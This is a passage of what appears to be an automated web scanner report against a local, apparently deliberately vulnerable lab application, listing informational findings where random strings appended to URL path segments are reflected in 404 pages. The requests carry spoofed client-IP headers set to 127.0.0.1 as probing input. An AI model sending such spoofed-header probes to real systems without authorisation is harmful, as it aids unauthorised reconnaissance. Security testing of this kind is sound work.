Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistekypugdioxu/js was not found on this server.</p>
...[SNIP]...
19.97. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistejt1eps7acj/examplewebiste/js/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistejt1eps7acj/examplewebiste/js/ was not found on this server.</p>
...[SNIP]...
19.98. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteuzzczrhn1y/js/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteuzzczrhn1y/js/ was not found on this server.</p>
...[SNIP]...
19.99. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jslj812t3mwz/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:30 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jslj812t3mwz/ was not found on this server.</p>
...[SNIP]...
19.100. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/add_event_listenersbpsmindoi1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/add_event_listenersbpsmindoi1 was not found on this server.</p>
...[SNIP]...
19.101. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteg5irh774ta/examplewebiste/js/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteg5irh774ta/examplewebiste/js/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.102. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistevb5icadrh4/js/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistevb5icadrh4/js/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.103. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js9l961y3mly/add_event_listeners HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js9l961y3mly/add_event_listeners was not found on this server.</p>
...[SNIP]...
19.104. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/add_event_listeners.jsvckgpcf08o HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/add_event_listeners.jsvckgpcf08o was not found on this server.</p>
...[SNIP]...
19.105. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteeitv2ifjtt/examplewebiste/js/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteeitv2ifjtt/examplewebiste/js/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.106. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistempnnj3p10u/js/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistempnnj3p10u/js/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.107. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/add_event_listeners.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jsres3hq8ca6/add_event_listeners.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jsres3hq8ca6/add_event_listeners.js was not found on this server.</p>
...[SNIP]...
19.108. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/examplewebistePagej9rx3gct8a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/examplewebistePagej9rx3gct8a was not found on this server.</p>
...[SNIP]...
19.109. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteypbi56zb35/examplewebiste/js/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteypbi56zb35/examplewebiste/js/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.110. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste6gijeixysh/js/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste6gijeixysh/js/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.111. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jsa0q4c4yuyk/examplewebistePage HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jsa0q4c4yuyk/examplewebistePage was not found on this server.</p>
...[SNIP]...
19.112. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js/examplewebistePage.jsssqm0wgb6w HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js/examplewebistePage.jsssqm0wgb6w was not found on this server.</p>
...[SNIP]...
19.113. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistezyx21jwwsn/examplewebiste/js/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistezyx21jwwsn/examplewebiste/js/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.114. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste5r30xl65yb/js/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste5r30xl65yb/js/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.115. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js/examplewebistePage.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/js7xiop4nkwl/examplewebistePage.js HTTP/1.1
Host: localhost
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/js7xiop4nkwl/examplewebistePage.js was not found on this server.</p>
...[SNIP]...
19.116. http://localhost/examplewebiste/instructions [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/instructions21q5rcjig9 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/instructions21q5rcjig9 was not found on this server.</p>
...[SNIP]...
19.117. http://localhost/examplewebiste/instructions [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistetckuhbnmqr/instructions HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistetckuhbnmqr/instructions was not found on this server.</p>
...[SNIP]...
19.118. http://localhost/examplewebiste/vulnerabilities/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities2vsk363mx5/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:34 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities2vsk363mx5/ was not found on this server.</p>
...[SNIP]...
19.119. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiestu8kd7n8rz/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiestu8kd7n8rz/brute/ was not found on this server.</p>
...[SNIP]...
19.120. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brutellqgwqed24/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brutellqgwqed24/ was not found on this server.</p>
...[SNIP]...
19.121. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesz1gg64nos1/brute/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
